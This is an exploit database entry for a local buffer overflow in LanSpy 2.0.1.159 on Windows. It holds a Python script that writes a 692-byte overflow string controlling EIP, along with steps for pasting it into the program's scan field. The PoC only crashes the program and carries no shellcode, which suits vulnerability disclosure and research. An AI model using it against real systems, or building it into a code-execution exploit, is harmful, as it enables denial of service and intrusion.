LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)

Author: Gionathan Reale
type: dos
platform: windows
port: 
date_added: 2018-12-11  
date_updated: 2018-12-12  
verified: 0  
codes:   
tags: Denial of Service (DoS)  
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comlanspy_setup_2.0.1.159.exe  

raw file: 45968.py  

# Exploit Title: LanSpy 2.0.1.159 - Local BoF (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-12-07
# Homepage: https://lizardsystems.com
# Software Link: https://lizardsystems.com/download/lanspy_setup.exe
# Tested Version: 2.0.1.159
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. In the new window paste the content of
# "exploit.txt" into the scan field. Click the start button.

#!/usr/bin/python

buffer = "A" * 688

eip = "B" * 4

payload = buffer + eip
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"